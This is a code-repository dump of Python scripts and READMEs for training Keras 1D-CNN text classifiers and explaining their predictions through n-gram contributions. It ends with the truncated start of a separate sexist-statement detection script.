loss, accuracy = model.evaluate(X_test, y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
<file_sep>/process_sent140.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
import re
filepath = 'data/sentiment_analysis/training.1600000.processed.noemoticon.csv'
df = pd.read_csv(filepath, names=['label', 'id', 'date', 'flag','user','sentence'], sep=',', encoding="utf8")
sentences = df['sentence'].values
labels = df['label'].values
writer = csv.writer(open("sent140.txt", 'w', newline='',encoding="utf8"), delimiter='\t')
max = 0
for sent,y in zip(sentences,labels) :
label = 0
sent = sent.replace('"',"")
sent = sent.replace("\t"," ")
sent = sent.replace("<br />"," ")
sent = re.sub("^@\w+",'',sent).strip()
if (len(sent)>max) :
max = len(sent)
#print (sent,y)
if y == 4 :
print("hit")
label = 1
elif y == 2 :
label = 2
if len(sent) < 50 :
writer.writerow([sent,label])
print(max)<file_sep>/lime.py
from lime.lime.lime_text import LimeTextExplainer, TextDomainMapper
import numpy
from keras.models import Model
from keras.models import model_from_json
from preprocessor import Preprocessor
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
embedding_dim = 50
n_classes=6
max_words = 50
models_dir = './models/'
model_name = 'qa_5500'
class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
#class_names = ['POSTIVE','NEGATIVE']
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
#sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Loaded model from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
#X_train, y_train, X_test, y_test = pre.get_sequences()
X_train, y_train, X_test, y_test = pre.get_sentences()
def new_predict(sample):
print(sample)
seq = pre.get_pad_sequence(sample)
print(seq)
#sample = seq.reshape(1, len(sample))
return model.predict(seq)
id=3
explainer = LimeTextExplainer(class_names=class_names)
exp = explainer.explain_instance(text_instance=X_test[id],labels=[0,1,2,3,4,5],classifier_fn=new_predict, num_samples=10000)
seq = pre.get_pad_sequence(X_test[id])
print(seq)
sent = pre.tokenizer.sequences_to_texts(seq)
print(sent)
out = new_predict([X_test[id]])
print(out)
y = numpy.argmax(out)
for i in range(6) :
print(class_names[i])
print(exp.as_list(i))
<file_sep>/train_1d_cnn.py
from preprocessor import Preprocessor
from text_cnn import TextCNN
#Define parameters :
model_name = 'merged' # other sentiment analysis predefined names include : imdb, yelp, amazon; QA models include : qa_1000 and qa_5500
embedding_dim = 50
n_classes=2 #change to 6 for question answering task
max_words = 50
kernel_sizes = [1]
n_filters = [40]
pre = Preprocessor(source=model_name,max_words = max_words,embedding_dim=embedding_dim, n_classes=n_classes)
X_train, y_train, X_test, y_test = pre.get_sequences(create_tokenizer=True)
#embedding_matrix = pre.create_embedding_matrix()
text_cnn = TextCNN(embedding_dim=embedding_dim,text_length=max_words, n_class=n_classes,kernel_sizes = kernel_sizes, n_filters = n_filters, batch_size=32,epochs=15 )
model = text_cnn.train(X_train, y_train, X_test, y_test, None, len(pre.tokenizer.word_index) + 1)
text_cnn.evaluate(X_train, y_train, X_test, y_test)
text_cnn.save_model(model_name)<file_sep>/text_cnn_old.py
from keras.models import Sequential
from keras import layers
from sklearn.model_selection import train_test_split
from keras import optimizers
from sklearn.metrics import confusion_matrix
from sklearn.linear_model import LogisticRegression
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
import tensorflow as tf
from keras.layers import Input
import pandas as pd
numpy.set_printoptions(precision=2)
from numpy.linalg import norm
class TextCNN :
def __init__(self, batch_size=32, text_length=50, embedding_dim=50, kernel_sizes = [1,2,3], n_filters = [100,100,100], n_class = 3):
self.kernel_sizes = kernel_sizes
self.n_filters = n_filters
self.embedding_dim = embedding_dim
self.batch_size = batch_size
self.text_length = text_length
self.n_class = n_class
self.model = None
def train(self, X_train, y_train, X_test, y_test):
pool = []
inputs = []
for kernel_size , n_filters in zip(self.kernel_sizes,self.n_filters) :
input_shape=(self.text_length,self.embedding_dim)
x = Input(shape=input_shape)
C1D = layers.Conv1D(n_filters, kernel_size, activation='relu',input_shape=(self.text_length,self.embedding_dim))(x)
MX1D = layers.GlobalMaxPool1D() (C1D)
pool.append(MX1D)
inputs.append(x)
merged = pool[0]
if len(self.kernel_sizes) > 1 :
merged = concatenate(pool)
dense1 = layers.Dense(10, activation='relu') (merged)
dense2 = layers.Dense(10, activation='relu')(dense1)
outputs = layers.Dense(self.n_class, activation='softmax') (dense2)
self.model = Model(inputs=inputs, outputs=outputs)
sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
self.model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
self.model.summary()
history = self.model.fit([X_train]*len(self.kernel_sizes), y_train, epochs=100, verbose=True, validation_data=([X_test]*len(self.kernel_sizes),y_test), batch_size=self.batch_size)
return self.model
def evaluate(self, X_train, y_train, X_test, y_test):
loss, accuracy = self.model.evaluate([X_train]*len(self.kernel_sizes), y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
loss, accuracy = self.model.evaluate([X_test]*len(self.kernel_sizes), y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
def save_model(self, model_name, model_dir='./models'):
model_json = self.model.model.to_json()
with open(model_dir+"/"+model_name+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_dir+"/"+model_name+".h5")
print("Saved model to disk")
model_name='sent140'
model_dir='models'
train_dataset = 'datasets/'+model_name+'/train.csv'
test_dataset = 'datasets/'+model_name+'/test.csv'
embedding_dim = 50
text_length = 50
n_class = 3
#train_data = numpy.loadtxt(train_dataset, delimiter=",", dtype=numpy.float32)
#test_data = numpy.loadtxt(test_dataset, delimiter=",", dtype=numpy.float32)
train_data = pd.read_csv(train_dataset, delimiter=",").values
test_data = pd.read_csv(test_dataset, delimiter=",").values
numpy.random.shuffle(train_data)
numpy.random.shuffle(test_data)
X_train = train_data[:,1:-n_class]
y_train = train_data[:,-n_class:]
X_test = test_data[:,1:-n_class]
y_test = test_data[:,-n_class:]
#normalize train an test matrices
train_norms = norm(X_train, axis=1, ord=2)
test_norms = norm(X_test, axis=1, ord=2)
train_norms[train_norms == 0] = 1
test_norms[test_norms == 0] = 1
print(train_norms)
X_train = X_train / train_norms.reshape(X_train.shape[0],1)
X_test = X_test / test_norms.reshape(X_test.shape[0],1)
print(X_train[:4,:10])
print(train_data[0,0],train_data[0,-1])
print(train_data[10,0],train_data[10,-2])
print(train_data[50,0],train_data[50,-1])
print(train_data[80,0],train_data[80,-2])
print(X_train.shape)
X_train = X_train.reshape((X_train.shape[0], text_length, embedding_dim))
X_test = X_test.reshape((X_test.shape[0], text_length, embedding_dim))
text_cnn = TextCNN(embedding_dim=embedding_dim,text_length=text_length)
model = text_cnn.train(X_train, y_train, X_test, y_test)
text_cnn.evaluate(X_train, y_train, X_test, y_test)
text_cnn.save_model(model_name)<file_sep>/explain_cnn.py
from explainer import TextCNNExplainer
from preprocessor import filepath_dict
from keras.models import model_from_json
from preprocessor import Preprocessor, filepath_dict
import json
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
models_dir = './models/'
#Define the parameters of the model to explain
embedding_dim = 50
n_classes=2
max_words = 50 # maximum number of word per sentence
kernel_sizes=[1]
model_name = 'merged'
#test_file_path = filepath_dict['qa_5500']
#class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
class_names = ['NEGATIVE','POSITIVE'] # for sentiment analysis
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Model loaded from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
X_train, y_train, X_test, y_test = pre.get_sequences()
#X_test, y_test = pre.texts_to_sequences(test_file_path)
explainer = TextCNNExplainer(pre.tokenizer, model_file_path, class_names, kernel_sizes=kernel_sizes)
#Explain the first 10 instances of the test data.
explanations = explainer.compute_ngrams_contributions(model, X_test[0:10,:], y_test[0:10,:])
refs = json.dumps(explanations, indent=4)
f = open("explanations/"+model_name+"_all_feature_ngrams.json", "w")
f.write(refs)
f.close()
print("Explanations saved in the file : ./explanations/"+model_name+"_all_feature_ngrams.json")
<file_sep>/process_qa.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
import re
filepath = 'data/sentiment_analysis/QA/TREC_10.label.txt'
labels_ids_path = 'data/sentiment_analysis/QA/qa_label_ids.json'
def load_labels_ids(file_name) :
if os.path.isfile(file_name):
with open(file_name) as f:
return json.load(f)
else:
return dict()
file = open(filepath, 'r', encoding="utf8")
lines = file.readlines()
last_id = 0
id = 0
labels_ids = load_labels_ids(labels_ids_path)
writer = csv.writer(open("data/sentiment_analysis/TREC_10.txt", 'w', newline='\n',encoding="utf8"), delimiter='\t')
for line in lines :
line = line.strip()
fields = line.split(" ")
label = fields[0].split(":")[0]
sent = ' '.join(fields[1:])
if label in labels_ids :
id = labels_ids[label]
else :
id = last_id
last_id = last_id + 1
print(id)
labels_ids.update({label:id})
writer.writerow([sent,id])
refs = json.dumps(labels_ids, indent=4)
f = open(labels_ids_path, "w")
f.write(refs)
f.close()
<file_sep>/data/readme.txt
This directory contains, datasets for sentiment analysis (imdb, amazon, yelp, merged) and for qa (qa_1000, qa_5500)
=======
Format:
=======
sentence \t class \n
=======
Details:
=======
For sentiment analysis, class is either 1 (for positive) or 0 (for negative)
For QA, class ranges from 0 to 5
"DESC": 0,
"ENTY": 1,
"ABBR": 2,
"HUM": 3,
"NUM": 4,
"LOC": 5
For the full datasets look:
imdb: Maas et. al., 2011 'Learning word vectors for sentiment analysis'
amazon: McAuley et. al., 2013 'Hidden factors and hidden topics: Understanding rating dimensions with review text'
yelp: Yelp dataset challenge http://www.yelp.com/dataset_challenge
<file_sep>/explainer.py
import numpy
from keras.models import Model
from keras.models import model_from_json
import math
def truncate(number, digits) -> float:
stepper = 10.0 ** digits
return math.trunc(stepper * number) / stepper
class TextCNNExplainer :
def __init__(self, tokenizer, model_file_path=None,class_names=None, kernel_sizes=[1,2,3]) :
self.tokenizer = tokenizer
self.model_file_path = model_file_path
self.class_names = class_names
self.kernel_sizes = kernel_sizes
self.conv_layers = ['conv1d_'+str(i) for i in range(1,len(kernel_sizes)+1)]
if len(kernel_sizes) > 1 :
self.max_pooled = 'concatenate_1'
else:
self.max_pooled = 'global_max_pooling1d_1'
def predict(self, model, data):
out = model.predict([data]*len(self.kernel_sizes))
def compute_contrib_dense(self, model, layer_name, data):
ow = model.get_layer("dense_2").get_weights()[0]
dense1 = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
dense1_out = dense1.predict([data]*len(self.kernel_sizes))
i = 0
contribs = numpy.empty((dense1_out.shape[0],ow.shape[0], ow.shape[1]), dtype=numpy.float32)
for out in dense1_out:
out = out.reshape((out.shape[0],1))
contrib = out * ow
contrib = contrib / (sum(abs(contrib))+0.000001)
contribs[i] = contrib
i += 1
return contribs
def compute_contrib_maxpool(self, model, layer_name, data):
weights = model.get_layer('dense_1').get_weights()[0]
c1 = self.compute_contrib_dense(model, "dense_1", data)
max_pool = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
max_out = max_pool.predict([data]*len(self.kernel_sizes))
i = 0
contribs = numpy.empty((max_out.shape[0], weights.shape[0], c1.shape[2]), dtype=numpy.float32)
for (out, c) in zip(max_out, c1):
out_1 = out.reshape((out.shape[0], 1))
contrib_mat = out_1 * weights
contrib_mat = contrib_mat / abs(contrib_mat).sum(axis=0)
contrib = contrib_mat.dot(c)
contribs[i] = contrib
i += 1
return contribs
def compute_contributions(self,model, data):
c2 = self.compute_contrib_maxpool(model, self.max_pooled, data)
return c2
"""
This method takes as input a sentence and a text cnn model and compute the necessary set of positive ngrams which
explain the model decision
"""
def necessary_feature_set(self,model, sample):
sample = sample.reshape(1, len(sample))
total_filters = model.get_layer(self.max_pooled).output.shape[1]
start = 0
contributions = self.compute_contributions(model, sample)[0]
ngrams = dict()
for conv_layer, filter_size in zip(self.conv_layers, self.kernel_sizes):
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([sample]*len(self.kernel_sizes))
n_filters = intermediate_output[0].shape[1]
out = intermediate_output[0]
ngrams_indices = numpy.argmax(out, axis=0) # indices of ngrams selected by global maxpooling.
seq = [sample[0, t:t + filter_size] for t in ngrams_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
# compute the adjacency matrix : two filter are adjacents if they select the same ngram
for i in range(n_filters):
contrib = contributions[start + i]
filters = [start + i]
if filtered_ngrams[i] in ngrams:
filters += ngrams.get(filtered_ngrams[i]).get("filters")
contrib += ngrams.get(filtered_ngrams[i]).get("contrib")
ngrams.update({filtered_ngrams[i]: {'filters': filters, 'contrib': contrib}})
start += n_filters # jump to the next list of filter (of different size)
output_prob = model.predict([sample]*len(self.kernel_sizes))
# print(output_prob)
pred_class = numpy.argmax(output_prob)
# print(pred_class)
positive_ngrams = [(x[0], x[1], {
'relevance': x[1]['contrib'][pred_class] - numpy.mean(numpy.delete(x[1]['contrib'], pred_class))}) for x in
ngrams.items() if x[1]['contrib'][pred_class] - numpy.mean(numpy.delete(x[1]['contrib'], pred_class))>0]
positive_ngrams.sort(key=lambda tup: tup[2]['relevance'], reverse=True)
new_model = model_from_json(model.to_json())
new_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
i = 0
retain_list = []
for ngram in positive_ngrams:
new_model.load_weights(self.model_file_path + '.h5')
y = new_model.predict([sample]*len(self.kernel_sizes))
y = y[0,pred_class]
weights = new_model.get_layer("dense_1").get_weights()
filters = ngram[1]['filters'] # all the filters associated to the courrent ngram
for k in filters:
weights[0][k] = 0;
new_model.get_layer("dense_1").set_weights(weights)
y = new_model.predict([sample]*len(self.kernel_sizes))
y = numpy.argmax(y)
if pred_class != y:
retain_list.append(ngram)
necessary_features = {}
for ngram in retain_list:
token = ngram[0]
key = str(len(token.split())) + '-ngrams'
if key in necessary_features:
necessary_features.get(key).append({ngram[0]: ngram[2]['relevance'].item()})
else:
necessary_features.update({key: [{ngram[0]: ngram[2]['relevance'].item()}]})
print(necessary_features)
return necessary_features
"""
This method takes as input a sentence and a text cnn model and compute the sufficient set of positive ngrams which
explains the model decision
"""
def sufficient_feature_set(self,model, sample):
sample = sample.reshape(1,len(sample))
total_filters = model.get_layer(self.max_pooled).output.shape[1]
start = 0
contributions = self.compute_contributions(model, sample)[0]
ngrams = dict()
for conv_layer, filter_size in zip(self.conv_layers,self.kernel_sizes) :
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([sample]*len(self.kernel_sizes))
print(intermediate_output.shape)
n_filters = intermediate_output[0].shape[1]
out = intermediate_output[0]
ngrams_indices = numpy.argmax(out,axis = 0) #indices of ngrams selected by global maxpooling.
seq = [sample[0,t:t + filter_size] for t in ngrams_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
#compute the adjacency matrix : two filter are adjacents if they select the same ngram
for i in range(n_filters) :
contrib = contributions[start+i]
filters = [start+i]
if filtered_ngrams[i] in ngrams :
filters += ngrams.get(filtered_ngrams[i]).get("filters")
contrib += ngrams.get(filtered_ngrams[i]).get("contrib")
ngrams.update({filtered_ngrams[i]:{'filters':filters,'contrib':contrib}})
start+=n_filters #jump to the next list of filter (of different size)
output_prob = model.predict([sample]*len(self.kernel_sizes))
pred_class = numpy.argmax(output_prob)
positive_ngrams = [(x[0],x[1],{'relevance':x[1]['contrib'][pred_class]-numpy.mean(numpy.delete(x[1]['contrib'], pred_class))})
for x in ngrams.items() if x[1]['contrib'][pred_class]-numpy.mean(numpy.delete(x[1]['contrib'], pred_class))>0]
positive_ngrams.sort(
key=lambda tup: tup[2]['relevance'])
weights = model.get_layer("dense_1").get_weights()
new_model = model_from_json(model.to_json())
new_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# load weights into new model
new_model.load_weights(self.model_file_path + '.h5')
i = 0
drop_list = []
print(positive_ngrams)
for ngram in positive_ngrams : # activate progressively positive features and see which are sufficient
filters = ngram[1]['filters']
for k in filters:
weights[0][k] = 0;
new_model.get_layer("dense_1").set_weights(weights)
y = new_model.predict([sample]*len(self.kernel_sizes))
y = numpy.argmax(y)
if pred_class != y :
break
drop_list.append(ngram)
i += 1
sufficient_features = dict()
for ngram in positive_ngrams :
if ngram not in drop_list :
token = ngram[0]
key = str(len(token.split()))+'-ngrams'
if key in sufficient_features :
sufficient_features.get(key).append({ngram[0]:ngram[2]['relevance'].item()})
else :
sufficient_features.update({key:[{ngram[0]:ngram[2]['relevance'].item()}]})
return sufficient_features
def compute_ngrams_contributions(self, model, data, targets = None):
start = 0
contribs = self.compute_contributions(model, data)
output_prob = model.predict([data]*len(self.kernel_sizes))
pred_classes = numpy.argmax(output_prob, axis=1)
if targets is not None :
target_classes = numpy.argmax(targets, axis=1)
else :
target_classes = [None]*len(pred_classes)
explanations = []
for d,y,p in zip(data,target_classes,pred_classes) :
target_class = y.item() if y is not None else None
pred_class = p.item()
if self.class_names is not None :
if target_class is not None :
target_class = self.class_names[y]
else :
target_class = None
pred_class = self.class_names[p]
e = {
'sentence': self.tokenizer.sequences_to_texts([d]),
'target_class': target_class,
'predicted_class': pred_class,
'features': {
'all': {},
'sufficient':self.sufficient_feature_set(model,d),
'necessary':self.necessary_feature_set(model,d)
}
}
explanations.append(e)
for filter_size,conv_layer in zip(self.kernel_sizes, self.conv_layers) :
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([data]*len(self.kernel_sizes))
n_filters = intermediate_output[0].shape[1]
k = 0
for (c_out, d, y, p) in zip(intermediate_output, data, target_classes, pred_classes):
max_indices = numpy.argmax(c_out, axis=0)
seq = [d[t:t+filter_size] for t in max_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
for i in range(n_filters):
contrib = contribs[k,start + i]
if filtered_ngrams[i] in explanations[k]['features']['all']:
contrib += explanations[k]['features']['all'].get(filtered_ngrams[i])
explanations[k]['features']['all'].update({filtered_ngrams[i]:contrib})
k += 1
start+=n_filters
for e, p in zip(explanations,pred_classes) :
ngrams = dict()
for key in e['features']['all'] :
l_key = str(len(key.split())) + '-ngrams' #1-grams, 2-grams, 3-grams, etc.
contrib = e['features']['all'][key]
print("Contribution", key, contrib)
rel = contrib[p]-numpy.mean(numpy.delete(contrib, p))
contrib = [v.item() for v in contrib]
if self.class_names is None :
contrib_dict = dict(zip(range(len(contrib)), contrib))
else :
contrib_dict = dict(zip(self.class_names, contrib))
contrib_dict.update({'Overall':rel.item()})
if l_key in ngrams :
ngrams.get(l_key).append({key:contrib_dict})
else :
ngrams.update({l_key:[{key: contrib_dict}]})
e['features']['all'] = ngrams
return explanations<file_sep>/analyse_merged.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
filepath = 'data/sentiment_analysis/merged_sent.txt'
df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\t', encoding="utf8")
sentences = df.sentence.astype(str).values
labels = df['label'].values
total_not = 0
total_not_neg = 0
for sent,y in zip(sentences,labels) :
sent = sent.lower()
if "not" in sent.split() :
total_not += 1
if y==0 :
total_not_neg += 1
else :
print(sent)
print(total_not, total_not_neg)<file_sep>/process_data.py
from preprocessor import Preprocessor
pre = Preprocessor(source='sent140',max_words = 50,embedding_dim=50, n_classes=3)
pre.generate_embedding_dataset() # generate train and test set consisting of embedding matrices<file_sep>/text_cnn.py
from keras import layers
from keras import optimizers
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
from keras.layers import Input
numpy.set_printoptions(precision=2)
class TextCNN :
def __init__(self, batch_size=32, epochs = 50, text_length=100, embedding_dim=100, kernel_sizes = [1], n_filters = [40], n_class = 2):
self.kernel_sizes = kernel_sizes
self.n_filters = n_filters
self.embedding_dim = embedding_dim
self.batch_size = batch_size
self.text_length = text_length
self.n_class = n_class
self.model = None
self.epochs = epochs
def train(self, X_train, y_train, X_test, y_test, embedding_matrix, vocab_size):
pool = []
inputs = []
for kernel_size , n_filters in zip(self.kernel_sizes,self.n_filters) :
input_shape=(self.text_length,self.embedding_dim)
x = Input(shape=(self.text_length,))
embedding = layers.Embedding(vocab_size, self.embedding_dim, input_length=self.text_length)(x)
C1D = layers.Conv1D(n_filters, kernel_size, activation='relu',input_shape=(self.text_length,self.embedding_dim))(embedding)
MX1D = layers.GlobalMaxPool1D() (C1D)
pool.append(MX1D)
inputs.append(x)
merged = pool[0]
if len(self.kernel_sizes) > 1 :
merged = concatenate(pool)
dense1 = layers.Dense(10, activation='relu') (merged)
#dense2 = layers.Dense(10, activation='relu')(dense1)
outputs = layers.Dense(self.n_class, activation='softmax') (dense1)
self.model = Model(inputs=inputs, outputs=outputs)
sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
self.model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
self.model.summary()
history = self.model.fit([X_train]*len(self.kernel_sizes), y_train, epochs=self.epochs, verbose=True, validation_data=([X_test]*len(self.kernel_sizes),y_test), batch_size=self.batch_size)
return self.model
def evaluate(self, X_train, y_train, X_test, y_test):
loss, accuracy = self.model.evaluate([X_train]*len(self.kernel_sizes), y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
loss, accuracy = self.model.evaluate([X_test]*len(self.kernel_sizes), y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
def save_model(self, model_name, model_dir='./models'):
model_json = self.model.to_json()
with open(model_dir+"/"+model_name+"_d"+str(self.embedding_dim)+"_l"+str(self.text_length)+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_dir+"/"+model_name+"_d"+str(self.embedding_dim)+"_l"+str(self.text_length)+".h5")
print("Saved model to disk")
<file_sep>/README.txt
This project implements a new method to explain 1D-CNN especially for text classification task. Codes was designed for
experimental purposes and cannot be used in the state to handle any type of 1D-CNN without adaptation. The project comes with
a multi-channel 1D-CNN model generator which can be used to generating testing models.
Dependencies :
- python 3.6+
- keras (tested on 2.2+)
- numpy (1.16+)
- pandas (0.24+)
The project contains 4 main directories :
--data/sentiment_analysis
This directory contains training and test data to build 1D-CNN models and test the explanation method
-- models :
This directory contains pretrained 1D-CNN models for sentiment analysis and for question answering task.
-- tokenizers :
This directory contains saved keras tokenizer for different datasets. The tokenizer contains the vocabulary that was used
to train the pretrained model associated to the dataset
-- explanations :
This directory contains the results of explanations when executing the file explain_cnn.py. The explanations provided are contained in a json
file associated to the name of the dataset/model to explain.
=======
Explaining a model
=======
- The file explain_cnn.py already has default value. python explain_cnn.py to execute the explainer with the default configurations.
- To explain another model on a set of samples, execute the following actions :
1. open the file explain_cnn.py an edit the model parameters :
- set the variable model_name to the model you want to explain. Pretrained model_names are : imdb, qa_1000, qa_5500, and merged
- Set the variable n_classes to the number of classes.
By default, the pretrained models was built with a word embedding dimension of 50 and a maximum number of words per sentence of 50
- Set the variable class_names to the name of classes : class_names = ['NEGATIVE','POSITIVE'] for Sentiment analysis
or class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC'] for Question Answering
- Set the variable embedding_dim to the dimension of the embedding vectors.
- The variable kernel_sizes is a list of integers representing the kernel_size per channel. Example : kernel_sizes = [1,2,3]
2. run the command python explain_cnn.py
3. The result of the explanation is contained in the directory explanations under the name : <model_name>_all_feature_ngrams.json
#To explain the model on a single sentence :
edit and execute the file explain_sentence.py
The code implemented to explain 1D-CNN assumes that the CNN architecture taken as input has exactly 2 dense layers,
a variable number of channels (from 1 to n), a single global max-pooling layer, one convolution layer per channel
and a variable number of filters and kernel_sizes per channel.
NB: Further versions will take into account models with a variable number of dense layers.
=======
Explanation results
=======
The complete json file representing the explanation for a set of predictions is structured as follows :
The json file is in the form of a list of elements where each element represents the explanation of a particular input sentence
The json element representing the explanation of each sentence was designed to be self-explanatory. Contributions are in the form
- ngram feature :
- CLASS_NAME : value
Overall represents the relevance of the feature to the class predicted as the difference between its contribution to this class
and the mean of its contribution to other classes except the predicted class.
[
{
"sentence": [
"it was either too cold not enough flavor or just bad"
],
"target_class": "NEGATIVE",
"predicted_class": "NEGATIVE",
"features": {
"all": {
"1-ngrams": [
{
"was": {
"NEGATIVE": 0.07160788029432297,
"POSITIVE": -0.06556335836648941,
"Overall": 0.13717123866081238
}
},
...
],
"0-ngrams": [
{
"": {
"NEGATIVE": 0.1498018503189087,
"POSITIVE": -0.11607369035482407,
"Overall": 0.26587554812431335
}
}
]
},
"sufficient": {
"1-ngrams": [
{
"not": 0.38679349422454834
}
]
},
"necessary": {}
}
},
...
]
"0-ngram" represents ngram features which are not in the vocabulary or the translation of 0-padding sequences
=======
Training a 1D-CNN model
=======
The project comes with codes to trained your own 1D-CNN.
To build your own CNN model
1. Defines the following parameters.
- model_name : models names are defined in the variable file_path_dic. If you want to build a model from your
own dataset, make sure the data file is saved inside the directory data/sentiment analysis and that its format is as described in data/readme.txt
Also make sure to add an entry corresponding to the data file in the dictionary file_path_dic
- embedding_dim : the dimension of word embeddings
- n_classes : The number of classes in the dataset
- max_words : The maximum number of words per sentence. Sentences with less word will be padded and sentences with higher number of words will
be pruned to reach the max_words
- kernel_sizes : a list of integers indicating the kernel_size per channel. Example : kernel_sizes = [1,2,3] means that they are 3 channels
and the first channel has filters of kernel_size 1, the second channel has filters of kernel_sizes 2 and the third channel has filters of
kernel sizes 3
- n_filters : a list representing the number of filters per channel. Example : n_filters = [40,40,40]. It means that every channel has 40 filters
which makes a total of 120 filters.
NB : len(kernel_sizes) == len (n_filters)
2. After execute the command python train_1d_cnn.py
The model will be saved in the directory models under a name related to the name defined in the variable model_name
<file_sep>/process_tripa.py
import glob
import json
import csv
import nltk
def jsontocsv():
files = glob.glob("json/*.json")
data_file = open('data_file.csv', 'w', encoding='utf-8')
for file in files:
with open(file) as json_file:
data = json.load(json_file)
reviews=data['Reviews']
sentenceid=1
csv_writer = csv.writer(data_file)
header=['sentenceid', 'reviewid', 'content']
csv_writer.writerow(header)
for review in reviews:
reviewid=review["ReviewID"]
content=review["Content"]
sentences = nltk.sent_tokenize(content)
for sentence in sentences:
csv_writer.writerow([sentenceid, reviewid, sentence])
sentenceid+=1
data_file.close()
jsontocsv()
|
315b372eac13472f0fcf71f66ae9683344187196
|
[
"Markdown",
"Python",
"Text"
] | 18 |
Python
|
Wednesque/xai-cnn-lrp
|
fa386bb5ed21abe1e6ff6e87410b133ac188c96c
|
42172dd90cca816b9503de8ae82edc95520dc7eb
|
refs/heads/master
|
<repo_name>JaquJaqu/Automatic_Detection_of_Sexist_Statements_Commonly_Used_at_the_Workplace<file_sep>/SexisteDetectionMain.py
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.layers import Dense, Input, Dropout, LSTM, Activation, TimeDistributed, Flatten, merge#, GlobalAveragePooling1D, regularizers
from keras.layers.embeddings import Embedding
from keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply
from keras.layers import RepeatVector, Dense, Activation, Lambda
from keras.models import load_model, Model, Sequential
from keras.utils import plot_model
from sklearn.metrics import f1_score, precision_score, recall_score
from sklearn.ensemble import GradientBoostingClassifier, AdaBoostRegressor, AdaBoostClassifier
from sklearn.model_selection import train_test_split
from SD_utils import *
from nmt_utils import *
import os
import io
import pprint as pp
import gc
np.random.seed(0)
#os.environ["PATH"] += os.pathsep + 'C:/Program Files/graphviz-2.38/bin'
sexist_dataset_fn = 'data/SD_dataset_FINAL.csv'
embedding_fn = 'data/vectors.txt'
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs(embedding_fn)
X, y = read_csv(sexist_dataset_fn)
m = len(y)
maxLen = len(max(X, key=len).split()) + 1
def sentence_to_avg(sentence, word_to_vec_map):
"""
Converts a sentence (string) into a list of words (strings). Extracts the GloVe representation of each word
and averages its value into a single vector encoding the meaning of the sentence.
Arguments:
sentence -- string, one training example from X
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
Returns:
avg -- average vector encoding information about the sentence, numpy-array of shape (50,)
"""
words = sentence.lower().split()
avg = np.zeros(50)
for w in words:
if w in word_to_vec_map:
avg += word_to_vec_map[w]
avg = avg / len(words)
return avg
def sentences_to_indices(X_s, word_to_index, max_len):
"""
Converts an array of sentences (strings) into an array of indices corresponding to words in the sentences.
The output shape should be such that it can be given to `Embedding()` (described in Figure 4).
Arguments:
X -- array of sentences (strings), of shape (m, 1)
word_to_index -- a dictionary containing the each word mapped to its index
max_len -- maximum number of words in a sentence. You can assume every sentence in X is no longer than this.
Returns:
X_indices -- array of indices corresponding to words in the sentences from X, of shape (m, max_len)
"""
m = X_s.shape[0] # number of training examples
X_indices = np.zeros((m, max_len)) # If there is more than one dimension use ()
for i in range(m): # loop over training examples
sentence_words = X_s[i].lower().split()
j = 0
for w in sentence_words:
